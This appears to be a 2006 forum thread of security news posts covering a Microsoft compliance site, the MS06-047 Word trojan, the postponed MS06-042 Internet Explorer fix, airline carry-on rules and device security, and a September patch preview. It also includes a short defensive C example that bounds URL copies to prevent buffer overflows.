Microsoft TechNet – New Regulatory Compliance Site
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The July Technet newsletter highlights a new site devoted to assisting companies in research efforts toward compliance related to five primary regulatory standards (including SOX). This new site should be used as a complementary resource, with precedence given to the official sites first.
Microsoft TechNet – New Regulatory Compliance Site
Regulations and Standards. This section provides an overview of the five major regulations and standards that this guide discusses:
* Sarbanes-Oxley Act (SOX)
* Gramm-Leach-Bliley Act (GLBA)
* Health Insurance Portability and Accountability Act (HIPAA)
* European Union Data Protection Directive (EUDPD)
* ISO 17799:2005 Code of Practice for Information Security Management (ISO 17799)
IT Controls. This section discusses the various types of IT controls, how these controls work in combination, and why they are important components that your organization can use to help meet its regulatory compliance obligations.
IT Audit Process. This section provides an overview of the IT audit process that auditors use to assess regulatory compliance for most organizations.
Business Drivers. This section discusses the business drivers for regulatory compliance that include challenges concerning regulatory environment complexity, achieving and maintaining compliance, and the consequences of noncompliance. It also discusses opportunities to establish and improve process, gain competitive advantage, and increase ROI for your organization through time and cost savings.
-
August 16, 2006 at 8:50 pm #3199280
MS06-047: Trojan.Mdropper.N – Exploits Word vulnerability patched in August
by harry waldron, cpcu, ccp · about 17 years, 7 months ago
In reply to Harry Waldron
Microsoft Office had several security updates in July and August. All users should be careful of suspicious documents, apply the latest service packs, and install all Office updates.
MS06-047: Trojan.Mdropper.N – Exploits Word vulnerability patched in August
http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-081616-2104-99
QUOTE – Trojan.Mdropper.N is a Trojan horse that exploits the Microsoft Visual Basic for Applications Document Check Buffer Overflow Vulnerability (as described in Microsoft Security Bulletin MS06-047) and attempts to drop a file on the compromised computer. The Trojan is a Microsoft Word document reportedly named: syosetu.doc
-
August 24, 2006 at 5:39 am #3199774
MS06-042 Re-release postponed to ensure Quality
by harry waldron, cpcu, ccp · about 17 years, 7 months ago
In reply to Harry Waldron
CERT has issued an advisory and Microsoft has updated their advisory regarding long URL strings that can cause a buffer overflow condition. The August 22nd release was postponed, so that QA issues could be fully resolved.
CERT – Microsoft Internet Explorer long URL buffer overflow
http://www.kb.cert.org/vuls/id/821156
QUOTE: Microsoft Internet Explorer 6 Service Pack 1 on Windows 2000 and Windows XP SP1 contains a vulnerability when viewing a web site using the HTTP 1.1 protocol. If the web site uses HTTP 1.1 compression and contains an overly long URL, a buffer overflow can occur. Note that this vulnerability was introduced with the first release of the MS06-042 updates on August 8, 2006.
MS06-042 Re-release postponed to ensure Quality
http://blogs.technet.com/msrc/archive/2006/08/22/448689.aspx
QUOTE: On August 15, 2006 Microsoft announced that it would be re-releasing MS06-042 Tuesday, August 22, 2006 to address an issue affecting Internet Explorer 6 Service Pack 1 customers discussed in Microsoft Knowledge Base Article 923762. Due to an issue discovered in final testing, Microsoft will not be re-releasing MS06-042 today. This update will be re-released for Internet Explorer 6 Service Pack 1 when it meets an appropriate level of quality for broad distribution.
Additional Links:
Microsoft Security Advisory (923762)
http://www.microsoft.com/technet/security/advisory/923762.mspx
Secunia
http://secunia.com/advisories/21557/
FrSIRT
http://www.frsirt.com/english/advisories/2006/3356
Security Focus
http://www.securityfocus.com/news/11408
-
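The long-URL overflow quoted above is a classic fixed-size-buffer defect. The following is an added illustration of the defensive pattern a parser should follow, written for this thread and not taken from Internet Explorer, CERT or the post: measure the incoming URL before copying it, and fail closed when it does not fit. `URL_BUF_LEN`, `safe_copy_url` and `make_long_url` are names chosen for the example.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <stdlib.h>

/* Illustrative buffer size: an assumption for the example, not a value
 * taken from any real browser. */
#define URL_BUF_LEN 256

/* Copy url into dst (capacity dstlen) only if it fits together with its
 * NUL terminator. Returns 0 on success, -1 for a bad buffer argument and
 * -2 when the URL is too long. Rejecting is safer than silently truncating,
 * because a truncated URL could still be acted on later. */
int safe_copy_url(char *dst, size_t dstlen, const char *url)
{
    if (dst == NULL || url == NULL || dstlen == 0)
        return -1;

    /* Bounded scan: memchr never reads past dstlen bytes, so even an input
     * with no terminator inside the window cannot be over-read here. */
    const char *end = memchr(url, '\0', dstlen);
    if (end == NULL)
        return -2;            /* no terminator within dstlen: URL too long */

    size_t n = (size_t)(end - url);   /* n < dstlen, so n + 1 <= dstlen */
    memcpy(dst, url, n + 1);          /* copy the bytes plus the terminator */
    return 0;
}

/* Build a constructed URL of exactly 'total' characters: a scheme and host,
 * then a path padded with 'A'. Caller frees the result. Used only to
 * exercise the length check; it is sample input, not observed traffic. */
char *make_long_url(size_t total)
{
    const char *prefix = "http://example.test/";
    size_t plen = strlen(prefix);
    if (total < plen + 1)
        total = plen + 1;
    char *s = malloc(total + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, prefix, plen);
    memset(s + plen, 'A', total - plen);
    s[total] = '\0';
    return s;
}

int main(void)
{
    char buf[URL_BUF_LEN];
    const char *ok = "http://example.test/index.html";
    printf("short URL: rc=%d\n", safe_copy_url(buf, sizeof buf, ok));

    char *big = make_long_url(4096);
    if (big != NULL) {
        printf("4096-byte URL: rc=%d (rejected, buffer untouched)\n",
               safe_copy_url(buf, sizeof buf, big));
        free(big);
    }
    return 0;
}
```

The design choice worth noting is the return code instead of truncation: a caller that silently shortens input keeps running on data that no longer matches what the peer sent, which is how length limits turn into logic bugs elsewhere.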
August 24, 2006 at 5:41 am #3199772
That won’t fly, how new airplane rules could affect you
by harry waldron, cpcu, ccp · about 17 years, 7 months ago
In reply to Harry Waldron
This article from Network World was highlighted in the morning email and documents some of the key changes associated with the new airline restrictions.
Article: That won’t fly, how new airplane rules could affect you
By: M. E. Kabay
As readers will no doubt be aware, on Aug. 10, British police arrested 21 people suspected of plotting to blow up planes flying from the U.K. to the U.S.
http://news.bbc.co.uk/2/hi/uk_news/4778575.stm
In the wake of these police actions, the U.K. Department of Transport issued new, stricter regulations limiting what passengers can take into aircraft cabins.
The press release of Aug. 10
http://news.bbc.co.uk/2/hi/uk_news/4778615.stm
This specifically allows only the following – and everything must be placed in a transparent plastic bag, not in pockets (quoting exactly):
* Pocket-size wallets and pocket-size purses plus contents (for example money, credit cards, identity cards etc (not handbags)
* Travel documents essential for the journey (for example passports and travel tickets)
* Prescription medicines and medical items sufficient and essential for the flight (e.g., diabetic kit), except in liquid form unless verified as authentic
* Spectacles and sunglasses, without cases
* Contact lens holders, without bottles of solution
* For those traveling with an infant: baby food, milk (the contents of each bottle must be tasted by the accompanying passenger) and sanitary items sufficient and essential for the flight (nappies, wipes, creams and nappy disposal bags)
* Female sanitary items sufficient and essential for the flight, if unboxed (e.g. tampons, pads, towels and wipes)
* Tissues (unboxed) and/or handkerchiefs
* Keys (but no electrical key fobs).
All other belongings must be stowed in checked luggage.
As I read these rules, business travelers, such as the readers of this column, who may need to fly to the U.K. and back from the U.S. will have to consider some information security issues.
First of all, nobody is going to be bringing laptop computers, cell phones, PDAs or even watches onto the aircraft. That restriction means that confidential information stored on such devices may now be exposed to greater threat than if the devices were kept with the passenger. Anyone planning to allow baggage handlers to have access to laptop computers and such would do well to act on security experts’ repeated pleas to use disk encryption.
On a personal note, my PDA uses strong encryption for confidential data, and my watch has a password on the “Note” section where I store such things as bank account numbers.
Not having your computer with you on a transatlantic flight may change your perspective on the productivity costs of international travel. I recommend you bring a good book, because you sure aren’t going to be answering e-mail, writing that management report you intended to finish, or even watching DVDs or listening to CDs or your iPod. And forget the sound suppressing earphones: I don’t see those on the approved list, either.
It is possible that we will see an increase in the relative value of electronic conferencing, perhaps including Web-camera feeds for videoconferencing in lieu of physical transatlantic meetings. If similar restrictions come to be applied in the U.S., the same cost/benefit calculations may reduce business air travel and increase virtual meetings. We will have to pay better attention to the security of such communications; VPNs will become standard operating procedures for any kind of confidential information interchange at such meetings.
-
September 11, 2006 at 8:07 am #3200361
Microsoft Security Updates Preview – September 2006
by harry waldron, cpcu, ccp · about 17 years, 6 months ago
In reply to Harry Waldron
Two Windows and one Office Update are scheduled for September 13, 2006. Home and corporate users should quickly implement these latest protective patches.
Microsoft Security Updates Preview – September 2006
http://www.microsoft.com/technet/security/bulletin/advance.mspx
-